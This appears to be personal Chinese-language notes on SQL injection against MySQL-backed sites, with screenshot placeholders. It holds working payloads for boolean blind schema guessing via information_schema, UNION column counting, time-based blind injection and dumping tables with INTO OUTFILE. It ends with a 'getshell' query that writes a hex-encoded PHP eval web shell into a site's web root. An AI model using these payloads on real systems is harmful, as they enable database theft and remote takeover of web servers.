测试如下：

select * from sdb_b2c_orders where order_id = '201610081070741' and (select * from sdb_b2c_members)#' and member_id = '13950'

Paste_Image.png

通过这条语句 是否有返回来确定要猜的数据库的名称的第一个字母的 ascii码是多少

select * from ds.destoon_ad where aid = 2 AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 21,1),1,1)) > 112;

121

select ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 21,1),1,2))

SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 21,1

select IFNULL(CAST(schema_name AS CHAR),CHAR(32)) FROM information_schema.SCHEMATA limit 21,1

information_schema.SCHEMATA表是关键

http://ascii.911cha.com/

猜表的列数：

一共猜十列: sqlmap中

select * from ds.destoon_ad where aid = 2 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--

select count(*) from information_schema.columns where table_schema='ds' and table_name='destoon_ad'

直接下载下来数据：

SELECT title,pid,typeid INTO OUTFILE 'tmp.txt' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n' FROM destoon_ad;

代码不报错 也可以注入：sleep函数帮你忙

Time-based blind SQL injection（基于时间延迟注入）：

Paste_Image.png Paste_Image.png

SQLMAP原理：

根据正确情况下返回的结果 和 错误下返回的结果 进行比较

Paste_Image.png Paste_Image.png Paste_Image.png

直接下载下来数据：

SELECT title,pid,typeid INTO OUTFILE 'tmp.txt' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n' FROM destoon_ad;

SELECT ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 21,1),3,1))

高危害性getshell脚本 前提是你得知道网站跟目录在哪

select * from destoon_ad where aid = 2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1,2,3,4,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e into outfile 'D:/serversoft/upupw/5.6/htdocs/alipay/cc.php'